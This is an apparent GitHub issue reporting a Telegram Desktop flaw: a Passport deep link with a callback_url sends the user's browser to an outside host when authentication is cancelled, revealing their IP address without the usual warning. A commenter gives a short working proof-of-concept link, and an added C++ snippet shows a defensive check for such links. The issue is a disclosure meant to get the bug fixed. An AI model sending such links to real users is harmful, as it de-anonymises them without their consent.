Security vulnerability: New Passport feature can leak the client's IP address #5020

Closed
MihaZupan opened this Issue Jul 27, 2018 · 1 comment


MihaZupan commented Jul 27, 2018

Steps to reproduce

  1. Send a malicious link to a chat/group
  2. The user clicks on the link, exposing the IP address without triggering the "Open this link" warning
  3. GG

Expected behaviour

There should be a warning before navigating to the callback if the user cancels the authentication

Actual behaviour

There is no such warning; the user can't escape leaking their IP, short of closing the entire app.

Configuration

Operating system: Windows
Version of Telegram Desktop: 1.3.10
Used theme: Doesn't matter

Details

The link isn't even exactly 'malicious'. It is a resolve/?domain=telegrampassport link.

--- Copy pasted from the email sent to security@telegram.org ---
The user can set a link associated with some text.
That means you can send a message like: check this out - this being a link.
With the passport feature that link can be a prompt for authentication e.g.
https://gist.github.com/MihaZupan/4143c292041d0dd80191e0419fdcd0b5

This link contains a callback field with an external URL.
If a user clicks on the link they are immediately prompted to enter authentication details. But if they close the window (which they obviously would if they just randomly clicked on a link) the client opens their browser and navigates to the callback link, exposing their IP address.
This is even more severe since for all other external links the client displays a warning, telling the user what that link points to. With this link the user practically cannot avoid giving out their IP, short of closing the whole app.

MihaZupan commented Jul 29, 2018

Even a link as short as tg://resolve/?domain=telegrampassport&callback_url=https%3A%2F%2Fbot-telegram.ml is enough. It's not even close to being a valid link for a passport request but the callback is still executed. This directly bypasses the link warning system.
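
The check a client needs before following a passport callback, as an added example that is not tdesktop's code: parse the tg://resolve link, percent-decode callback_url, and route anything that leaves the app through the same "Open this link?" confirmation as any other external link, cancelled authentication included. The function names and the example.com callback are constructed for this illustration.

```cpp
#include <cctype>
#include <map>
#include <optional>
#include <string>

// Percent-decode one URL component, e.g. "https%3A%2F%2F" -> "https://".
std::string percentDecode(const std::string& s) {
    std::string out;
    for (size_t i = 0; i < s.size(); ++i) {
        if (s[i] == '%' && i + 2 < s.size() &&
            std::isxdigit(static_cast<unsigned char>(s[i + 1])) &&
            std::isxdigit(static_cast<unsigned char>(s[i + 2]))) {
            out.push_back(static_cast<char>(std::stoi(s.substr(i + 1, 2), nullptr, 16)));
            i += 2;
        } else if (s[i] == '+') {
            out.push_back(' ');
        } else {
            out.push_back(s[i]);
        }
    }
    return out;
}

// Split the query part of a tg:// link into decoded key/value pairs.
std::map<std::string, std::string> parseQuery(const std::string& link) {
    std::map<std::string, std::string> params;
    const auto q = link.find('?');
    if (q == std::string::npos) return params;
    const std::string query = link.substr(q + 1);
    size_t start = 0;
    while (start <= query.size()) {
        const size_t amp = query.find('&', start);
        const std::string pair = query.substr(start, amp == std::string::npos ? std::string::npos : amp - start);
        const auto eq = pair.find('=');
        if (eq != std::string::npos)
            params[percentDecode(pair.substr(0, eq))] = percentDecode(pair.substr(eq + 1));
        if (amp == std::string::npos) break;
        start = amp + 1;
    }
    return params;
}

// Returns the external URL that must be shown in the usual "Open this link?"
// dialog before the browser is opened, or nullopt if nothing would leave the app.
// Hypothetical helper: it mirrors the decision the issue asks the client to make.
std::optional<std::string> externalUrlNeedingConfirmation(const std::string& link) {
    if (link.rfind("tg://resolve", 0) != 0) return std::nullopt;
    const auto params = parseQuery(link);
    const auto domain = params.find("domain");
    if (domain == params.end() || domain->second != "telegrampassport") return std::nullopt;
    const auto cb = params.find("callback_url");
    if (cb == params.end() || cb->second.empty()) return std::nullopt;
    // A tg:// callback stays inside the app; anything else contacts a remote
    // host and reveals the client's IP, so it gets the external-link warning.
    if (cb->second.rfind("tg://", 0) == 0) return std::nullopt;
    return cb->second;
}
```

The caller would show the returned URL in the confirmation dialog and open the browser only if the user accepts, whether the passport prompt was completed or dismissed.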

MrMebelMan added a commit to MrMebelMan/tdesktop that referenced this issue Aug 31, 2018